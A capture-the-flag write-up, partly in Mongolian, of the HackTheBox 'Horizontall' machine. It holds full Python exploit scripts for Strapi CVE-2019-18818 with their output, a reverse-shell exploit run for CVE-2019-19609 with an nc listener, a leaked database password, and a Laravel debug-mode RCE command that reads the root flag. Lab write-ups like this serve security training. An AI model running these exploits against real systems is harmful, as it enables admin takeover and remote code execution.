1. IP Address
# Machine Address
10.10.11.105
# Local Address
10.10.14.139
horizontall.htb -> etc/chosts
2. Nmap
nmap -sV -sC -oA nmap/horizontall 10.10.11.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 02:22 EST
Nmap scan report for 10.10.11.105
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.48 second
22 SSH
90 TCP
3. Gobuster
gobuster dir -u http://horizontall.htb/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/11 02:40:58 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
Progress: 15257 / 220561 (6.92%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/11/11 02:47:09 Finished
===============================================================
path олдоогүй.
fuff хийж болно гэхдээ өөр лист бас ашиглаж болно.
gobuster vhost dir -u http://horizontall.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
энэ удах шинжтэй давхар fuff уншуулав.
ffuf -w /opt/SecLists/Discovery/DNS/shubs-subdomains.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -t 200 -fl 10
Дээрк түрүүлж дууссан. 302 буцаасан олон лист байсан. Удаан ч gobuster -аа хүлээсэн.
Gobuster Out:
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/11 03:24:05 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
Progress: 49562 / 114442 (43.31%) ^C
[!] Keyboard interrupt detected, terminating.
api-prod.horizontall.htb -> etc/hosts
http://api-prod.horizontall.htb/admin/auth/login
4. CVE-2019-18818
- https://thatsn0tmysite.wordpress.com/2019/11/15/x05/
- https://github.com/offensive-security/exploitdb/blob/master/exploits/multiple/webapps/50237.py
wget:
# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818
#!/usr/bin/python
import requests
import sys
import json
userEmail = "valid@email.com"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"
s = requests.Session()
# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)
print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))
# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
# Password reset
print("[*] Password reset for user: {}".format(userEmail))
resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
s.post("{}/".format(strapiUrl), json=resetPasswordReq)
# Set new password
print("[*] Setting new password")
exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword}
r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)
# Check if the password has changed
if "username" in str(r.content):
print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
else:
print("\033[91m[-] Something went wrong\033[0m")
sys.exit(1)
else:
print("\033[91m[-] This version is not vulnerable\033[0m")
sys.exit(1)
Дээрх болоолгүй.
Дахин:
import requests
import sys
import json
args=sys.argv
if len(args) < 4:
print("Usage: {} <admin_email> <url> <new_password>".format(args[0]))
exit(-1)
email = args[1]
url = args[2]
new_password = args[3]
s = requests.Session()
version = json.loads(s.get("{}/admin/strapiVersion".format(url)).text)
print("[*] Detected version(GET /admin/strapiVersion): {}".format(version["strapiVersion"]))
#Request password reset
print("[*] Sending password reset request...")
reset_request={"email":email, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(url)}
s.post("{}/".format(url), json=reset_request)
#Reset password to
print("[*] Setting new password...")
exploit={"code":{}, "password":new_password, "passwordConfirmation":new_password}
r=s.post("{}/admin/auth/reset-password".format(url), json=exploit)
print("[*] Response:")
print(str(r.content))
CLI:
python3 meth2.py admin@horizontall.htb http://api-prod.horizontall.htb 123456
Result:
python3 meth2.py admin@horizontall.htb http://api-prod.horizontall.htb 123456
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
b'{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM2NjIxODcxLCJleHAiOjE2MzkyMTM4NzF9.OiegA_xE8zbXCJC02z9JK8_8DZs2I9kCzAE0Uk-2u5A","user":{"id":3,"username":"admin","email":"admin@horizontall.htb","blocked":null}}'
5. CVE-2019-19609
nc -lvnp 9001
Git:
git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
python3 exploit.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM2NjIyMDUxLCJleHAiOjE2MzkyMTQwNTF9.f93JYZArCGszsaQIPBtPZJKgq9QD4xRsViSPHqI9c-Y -l 10.10.14.139 -p 9001
shell баланс:
python -c 'import pty;pty.spawn("/bin/bash")'
User.txt
c7978bf*********
6. Privilege Escalation
myapi/config/environments/development/database.json:
{
"defaultConnection": "default",
"connections": {
"default": {
"connector": "strapi-hook-bookshelf",
"settings": {
"client": "mysql",
"database": "strapi",
"host": "127.0.0.1",
"port": 3306,
"username": "developer",
"password": "#J!:F9Zt2u"
},
"options": {}
}
}
}
developer: #J!:F9Zt2u mysql руу нэвтэрч орж болно. Гэхдээ
ss -lp
Нээлттэй байгаа порт шалгаж үзнэ. nmap-р харагдаагүй порт байгааг шалгаж байгаа. Порт 8000 нээлттэй байна. Machine -с port forward хийж нээлттэй байгаа порт руу authorized_keys дамжаад нэвтрэн орно. Орохын тулд ssh-keygen -г machine талдаа дахин generate хийгээд id_rsa.pub + vm id_rsa.pub -г autherized_keys дотор хуулж өгнө.
port forwarding -г vm машин
ssh -L 8000:127.0.0.1:8000 strapi@horizontall.htb
VM хандалт хийгээд орж байвал ок -> LARAVEL
http://127.0.0.1:8000/
Searchploit:
sudo apt -y install exploitdb
**searchsploit laravel**
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Laravel - 'Hash::make()' Password Truncation Security | multiple/remote/39318.txt
Laravel 8.4.2 debug mode - Remote code execution | php/webapps/49424.py
Laravel Administrator 4 - Unrestricted File Upload (Authenticated) | php/webapps/49112.py
Laravel Log Viewer < 0.13.0 - Local File Download | php/webapps/44343.py
Laravel Nova 3.7.0 - 'range' DoS | php/webapps/49198.txt
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit) | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload | php/webapps/46389.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Laravel 8.4.2 debug mode - Remote code execution
searchsploit -p 49424
Exploit: Laravel 8.4.2 debug mode - Remote code execution
URL: https://www.exploit-db.com/exploits/49424
Path: /usr/share/exploitdb/exploits/php/webapps/49424.py
File Type: Python script, ASCII text executable
Copied EDB-ID #49424's path to the clipboard
Хуулах:
cp /usr/share/exploitdb/exploits/php/webapps/49424.py .
Run
python3 49424.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'cat /root/root.txt'
Port forward хийсэн машин руу нэвтэрч чадахгүй харин exploit ашиглаад замыг нь заагаад дотор нь байгаа зүйлийг хэвлэн харуулах…
Root.txt
6f8f2d******************